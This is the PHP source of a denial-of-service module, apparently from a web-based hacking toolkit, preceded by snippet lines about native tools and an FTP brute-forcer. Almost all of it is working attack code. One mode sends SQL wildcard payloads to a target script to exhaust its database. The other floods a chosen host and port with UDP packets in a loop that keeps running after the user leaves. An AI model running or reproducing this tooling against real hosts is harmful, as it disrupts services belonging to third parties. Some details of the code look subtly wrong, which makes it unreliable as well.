..I will show you how to create native tools. I'm not going to make a new tool though, instead I will show you what is required to create one. You can find all the native tools in the..
AntiFTP uses wordlists in order to bruteforce FTP user accounts
<?php
/* Handler for xDoS
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 16-04-2015
*/
set_time_limit(0);
ignore_user_abort(true);
// set variable to be able to save a task
$_MODULE_C = "thc_xd";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
if(isset($_POST['sVar'])){
/*
Attempt to see whether a script could be vulnerable to wildcard attacks.
For best results you should try this on a script that searches a huge amount of records.
More info: https://www.owasp.org/index.php/Testing_for_SQL_Wildcard_Attacks_%28OWASP-DS-001%29
*/
$aUrl = @parse_url($_POST['sUrl']);
if(!isset($aUrl['host']) || $aUrl['host']==""){
die(Screen($sOut."Invalid host or ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(!isset($aUrl['path']) || $aUrl['path']==""){
die(Screen($sOut."Invalid path to script".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(!isset($aUrl['query']) || $aUrl['query']==""){
die(Screen($sOut."Invalid query to poison".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_POST['sVar'] = trim($_POST['sVar']);
if(!preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
die(Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_POST['iDelay'] = intval(trim($_POST['iDelay']));
if($_POST['iDelay']<0){
// really funny, you should become a comedian or something..
$_POST['iDelay'] = 0;
}
$_POST['iCache'] = !isset($_POST['iCache']) ? 0 : 1;
if(!preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
die(Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// get is always default
$_POST['sMethod'] = @$_POST['sMethod']!="post" ? "GET" : "POST";
// create benchmark properties
$_CONTEXT['benchmarks'] = array();
$_CONTEXT['benchmarks']['test'] = array();
$_CONTEXT['benchmarks']['test']['payload'] = array();
$_CONTEXT['benchmarks']['test']['payload'][0] = "test1";
$_CONTEXT['benchmarks']['test']['payload'][1] = "test2";
$_CONTEXT['benchmarks']['test']['query'] = array();
$_CONTEXT['benchmarks']['test']['query'][0] = "";
$_CONTEXT['benchmarks']['test']['query'][1] = "";
$_CONTEXT['benchmarks']['test']['results'] = array();
$_CONTEXT['benchmarks']['wildcards'] = array();
$_CONTEXT['benchmarks']['wildcards']['payload'] = array();
$_CONTEXT['benchmarks']['wildcards']['payload'][0] = "'%64_[^!_%65/%ab?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
$_CONTEXT['benchmarks']['wildcards']['payload'][1] = "'%64_[^!_%65/%aa?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
$_CONTEXT['benchmarks']['wildcards']['query'] = array();
$_CONTEXT['benchmarks']['wildcards']['query'][0] = "";
$_CONTEXT['benchmarks']['wildcards']['query'][1] = "";
$_CONTEXT['benchmarks']['wildcards']['results'] = array();
// make sure the variable exists in the url
$aQuery = @explode("&",$aUrl['query']);
$bValid = false;
for($x=0;$x<count($aQuery);$x++){
// construct search queries
if($x!=0){
$_CONTEXT['benchmarks']['test']['query'][0] .= "&";
$_CONTEXT['benchmarks']['test']['query'][1] .= "&";
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "&";
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "&";
}
$aVarValue = explode("=",$aQuery[$x]);
$_CONTEXT['benchmarks']['test']['query'][0] .= $aVarValue[0];
$_CONTEXT['benchmarks']['test']['query'][1] .= $aVarValue[0];
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= $aVarValue[0];
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= $aVarValue[0];
if($aVarValue[0]==$_POST['sVar']){
$_CONTEXT['benchmarks']['test']['query'][0] .= "=".$_CONTEXT['benchmarks']['test']['payload'][0];
$_CONTEXT['benchmarks']['test']['query'][1] .= "=".$_CONTEXT['benchmarks']['test']['payload'][1];
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][0];
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][1];
$bValid = true;
}
}
if(!$bValid){
die(Screen($sOut."Invalid query, expecting variable name in url".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// looks valid from here, let's see if the host is up before we start benchmarking
echo Screen($sOut."<b>".($_POST['iCache']==1 ? "Caching is enabled, sending two different queries per query type" : "Both query types will be run two times")."</b><br /><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// host is up, start benchmarking
include_once($_PATHS['includes_root']."/task_start.php");
// every type of benchmark
foreach($_CONTEXT['benchmarks'] as $sType=>$aValues){
// amount of queries per benchmark
for($x=0;$x<2;$x++){
echo "<p><b>".$sType."</b> - sending ".strtolower($_POST['sMethod'])." request ".($x+1)." to ".$aUrl['host']." ...please wait.</p><blockquote>";
$iStart = microtime(true);
flush();
ob_flush();
$ch = curl_init();
if($_POST['sMethod']=="GET"){
curl_setopt($ch, CURLOPT_URL, $aUrl['scheme']."://".$aUrl['host'].$aUrl['path']."?".$_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==1 ? $x : 0)]);
}
else{
curl_setopt($ch, CURLOPT_URL, $aUrl['scheme']."://".$aUrl['host'].$aUrl['path']);
curl_setopt($ch, CURLOPT_POSTFIELDS, $_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==1 ? $x : 0)]);
}
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101506 Ubuntu/10.04 (lucid) Firefox/3.6.13 GTB7.1');
if(!$sResult = @curl_exec($ch)){
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
die(Screen("Can't get headers, are you sure the host is up?".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_CONTEXT['benchmarks'][$sType]['results'][] = microtime(true) - $iStart;
echo "<br />request completed in ".$_CONTEXT['benchmarks'][$sType]['results'][$x]." seconds<br/>";
@curl_close($ch);
if($_POST['iDelay']!=0){
echo "<br />waiting ".$_POST['iDelay']." second(s) for possible next request<br/>";
sleep($_POST['iDelay']);
}
echo"</blockquote>\n";
}
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
}
elseif(isset($_POST['iDuration'])){
/* sends udp packets to the specified host*/
echo $sOut;
$_POST['iDuration'] = @intval($_POST['iDuration']);
if($_POST['iDuration']<1){
die(Screen("Invalid duration of udp scan".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$sIP = @gethostbyname($_POST['sHost']);
$aIP = explode(".",$sIP);
if(count($aIP)!=4){
die(Screen("Failed to convert host to ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$iPort = @intval($_POST['iPort']);
if($iPort>0 && $iPort<65355){
include_once($_PATHS['module_default_root']."/poison.php");
}
else{
die(Screen("Invalid port number".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$iStart = time();
$iEnd = time()+$_POST['iDuration'];
$iScans = 1;
echo Screen("<p><b>initialising scan on host ".$sIP.":".$iPort."</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
include_once($_PATHS['includes_root']."/task_start.php");
while(true){
flush();
ob_flush();
$sPayload = Poison();
echo Screen("<br /><b>connection ".$iScans.":</b> sending ".strlen($sPayload)." bytes of data - ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
$fp = @fsockopen("udp://".$sIP,$iPort,$errno,$errstr,3);
@fwrite($fp,$sPayload);
echo Screen("<b>".($errstr=="" ? "completed" : $errstr)."</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
fclose($fp);
if(time()>=$iEnd){
echo Screen("<p><b>reached total scan duration (".$_POST['iDuration']." second(s)), aborting now...</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
break;
}
$iScans++;
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo $sEnd;
}
else{
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
?>